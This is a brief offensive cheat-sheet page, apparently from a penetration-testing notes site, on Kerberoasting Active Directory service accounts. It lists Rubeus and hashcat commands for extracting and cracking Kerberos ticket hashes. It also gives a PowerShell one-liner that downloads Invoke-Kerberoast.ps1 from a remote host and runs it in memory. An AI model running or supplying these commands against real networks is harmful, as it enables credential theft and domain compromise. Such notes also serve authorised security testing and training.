Kerberoasting
With Rubeus
.\Rubeus.exe kerberoast
hashcat -m 13100 -a 0 kerb_accounts.txt rockyou.txt
With PowerShell
iex (New-Object Net.WebClient).DownloadString('http://192.168.99.2:81/Invoke-Kerberoast.ps1')
Invoke-Kerberoast -OutputFormat hashcat | % { $_.Hash } | Out-File -Encoding ASCII hashes.13100.out
hashcat -m 13100 -a 0 kerb_accounts.txt rockyou.txt
Last updated
Was this helpful?